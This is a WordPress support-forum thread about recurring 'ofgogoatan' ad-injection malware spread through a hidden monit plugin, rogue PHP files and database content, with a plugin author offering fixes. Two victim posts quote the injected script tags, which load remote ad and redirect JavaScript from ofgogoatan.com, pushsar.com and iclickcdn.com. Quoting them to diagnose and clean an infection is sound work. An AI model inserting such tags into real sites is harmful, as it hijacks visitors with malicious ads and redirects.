DB Injection appears again and again…

Update:
The following files found being re-injected to the site (wordfence plugin)?.
However, these found with daemon owner, I had to change the owner and delete them. But, still found being re-injected.

directory:
wp-content/wflogs/

screenshot of the files found:
https://ibb.co/kD9WbMp

• This reply was modified 4 years, 6 months ago by tozaorg.
• This reply was modified 4 years, 6 months ago by tozaorg.

I’m having the same issues described in this topic (ofgogoatan redirect) but running scans does not reveal anything harmful.

I have, however, discovered a multitude of .php files created about 10 days ago that contain the same content within the file and take the name of the folder they are placed in. These include names like “fonts.php”, “structure.php”, “images.php”, and so on. Some are just labeled “index.php” and again, contain the same text inside.

I’m going to delete these files and see if anything changes. I have the structures.php file here if anyone is interested in taking a look: https://www.mediafire.com/file/3wvmudbyu9gs12k/structure.php/file

Hi Eli, needless to say your plugin is great.

I’ve been dealing with this issue for the past few weeks. Same scenario than other members (Wordfence not detecting it but Sucuri does).

Here’s MY EXPERIENCE AND SOLUTION so far:

Injected files on folder: wp-content / plugins

1o) monit.php / Ofgogoatan code was injected here. You must EDIT out those lines.
2o) admin_ips.txt / DELETE it, it’s not functional whatsoever. If you delete it but leave monit.php unchanged this file will be regenerated.

Just emailed you the code and I’ll repost if issue is reproduced in the coming days.

Thanks!

same issue wf still no solutions still it is there did everything mentioned here

@superzambezi,
Thanks for posting the full contents of that file. This was not at all the same threat as everyone else in this thread was talking about, but it was a new threat that I had not seen before, so I added it to my definition updates and it too can now be automatically found and fixed using my plugin with the latest definitions.

@tozaorg,
Your screenshots only show a bit of the malicious code but it looks like the same thing almost everyone else here was dealing with, and it is already in my definitions, so if you make sure that you have the latest definition updates and run the complete scan again then my plugin should find it and remove it. If you have anything else that was not found by my plugin then please post the full contents of the infected files or send them to me directly: eli AT gotmls DOT net

@sahilkumargaba,
Really? It sounds like you are just advertising yourself here and were smart enough to not mention money up front. If you have something helpful to contribute or if you know of a specific solution that worked for you then please feel free to post the details here, as @cyrse did, because it might be helpful to others who are having the same issue.

@ahmedmustafahashmi,
If your issue is truly the same than something here should have worked for you as this issue is already resolved. Also, if you want more help with your specific issue you should post more details so that we can assess you situation and provide helpful suggestions. Posting URLs to relevant info or screenshots of the scan results can usually be very helpful too.

Also, please not that this topic was resolved because my plugin can detect and remove this threat for you automatically, and if you are having any issues with my plugin you can also contact me directly free support or you can post your questions on my own forum at https://gotmls.net/support/forum/

@tozaorg did you try a backup restore or did you just delete the template files? If you have sub domains or directories the file will most probably appear there.

If you just delete the monit file I believe you will have issues accesing your wp-admin. Hopefully the plugin will be able to fully resolve the malware problem.

Hi guys, we found the files appearing again and again, even after cleaning the site. Anyone solved this? I was advised to change hosting since users experiencing the issue took that step and solved the problem.

Any thoughts?

Hello good day everyone, a week ago I discovered on my site those ads and for those who do not know them they are similar to these:
https://ibb.co/4ZTXKzx

That’s right, it is about ofgogoatan.com, I recently created my website and just last week those ads appeared to me, today I have installed the Anti-Malware plugin from GOTMLS.NET and so far, it is the solution I have found, the ofgogotan’s ads have disappeared and are apparently stored in the monit.php file:
https://ibb.co/0C1jBwK

I hope that my site will not be infected again, today I will clean it and hopefully it will stay that way.

To finish, friend @scheeeli a question: Do I have to delete the scripts that appear in the ad code or is it not necessary?
https://ibb.co/F6cYBRt

I hope you can help me, I am new to WordPress. Greetings from Peru.

Hello,
I’ve same issue here with this code :

<meta name=”propeller” content=”0d1ba639c78d2bf91cbfe52d30bdfff2″>
<script src=”https://pushsar.com/pfe/current/tag.min.js?z=3305143&#8243; data-cfasync=”false” async></script>
<script type=”text/javascript” src=”//ofgogoatan.com/apu.php?zoneid=3305137″ async data-cfasync=”false”></script>

Each day i found it write on theme/header.php….
Sometimes find a code on my functions.php file…

I’ve change host credentials, wordpress admin credentials…
I really start mad with this f*** malware !!
How can i check in database if code was write somewhere ?

Really need a solution.
Please help.

PS: code from propeller ads network, i’ve contact them and they don’t do anything to block hacker account…

I can’t find any file name monit.php

I can’t access this url “my_domain/wp-admin/options-general.php?page=monit” this page display message : “Sorry, you are not allowed to access this page.”

still issue is there not resolved

Today no detection by “Anti-Malware from GOTMLS.NET” and securi, but still new code on header :

<meta name=”propeller” content=”0d1ba639c78d2bf91cbfe52d30bdfff2″>
<script>(function(s,u,z,p){s.src=u,s.setAttribute(‘data-zone’,z),p.appendChild(s);})(document.createElement(‘script’),’https://iclickcdn.com/tag.min.js&#8217;,3305137,document.body||document.documentElement)</script>

@descargandolo Did you use original plugin and theme files? the root cause for this is using files downloaded from non official sites.

Removing the malware with the gotmls plugin will resolve the problem but you will need to manually clear database files. Otherwise Google will still pick up malicious code.

@sahilkumargaba after running scan, the URL is still injected in DB, usually can be found in information_schema process table. No harm is being done at this point but Google will still read the malicious URL. Sent you an email regarding this point.

@ahmedmustafahashmi,
Please read my response this time: if you want help with your specific issue you should post some details so that we can provide helpful suggestions relevant to your problem. It does no good to just say “same here” when everyone else is presenting specific problems and getting solutions that should be helping you too if you have the same issue. Posting a URL to your infected pages or screenshots of the scan results can also be very helpful.

@neocraft,
Ss you describe your infection: no file named monit.php; no page at the URL …/wp-admin/options-general.php?page=monit ; and the scripts you found int your theme’s header.php or functions.php file. So, this is not the same infection that everyone else is talking about here in this thread. You don’t have these scripts injected into your DB you have some hacker writing these scripts into your theme files. These scripts generate ads from an ad network and hackers are making money by injecting ads with their key into thousands of site using many different methods, not just this hidden monit plugin. However, I have added these new variants to my definition updates so that those ads can be automatically removed from your theme files too using my plugin now.

@descargandolo,
If you can still access the setting page at …/wp-admin/options-general.php?page=monit then you have not removed the hidden plugin yet. You need to remove the plugin plus all the script tags that were injected into your DB content. My plugin should be able to do all this for you automatically when you run the complete scan if you have downloaded the latest definition updates.

@josecarlostf,
Yes, hosting matters … a lot. Many of these instances of people getting reinfected again after they have completely cleaned their site site are because they are on a shared hosting environment that simply allows these type of infections to spread from one site to another. This kind of circular infection pattern can continue indefinitely if it is not addressed on all the affected site at once. For those that cannot stay clean and keep getting hit with the same threat it is sometimes best to move to a more secure hosting environment.

@sahilkumargaba,
Dude, I told you before. This is not a place to phish for leads. If you need work then advertise, but not here. If you have a solution then post it already and stop trying to bait these victims into emailing you for some miraculous fix. If the forum moderators see these posts of yours they will probably ban you. I see you have been phishing on other threads too and even asking for other peoples wp-admin logins on the forum, not cool.

@scheeeli What do you mean by other threads, the one where i asked for details 3 years ago. And by the way this is the third message which i posted on forum. GOT IT

If you think What I’m doing is wrong i’ll not post to your forum again.

I find this forum on google where I’m searching for how to remove monit.php malware from the website. But after using your plugin it doesn’t completely remove the malware from the website.

After researching i found the way to remove the malware from the website completely.

If you want to know how we removed the malware from the website you can contact me on my email which is given on previous message.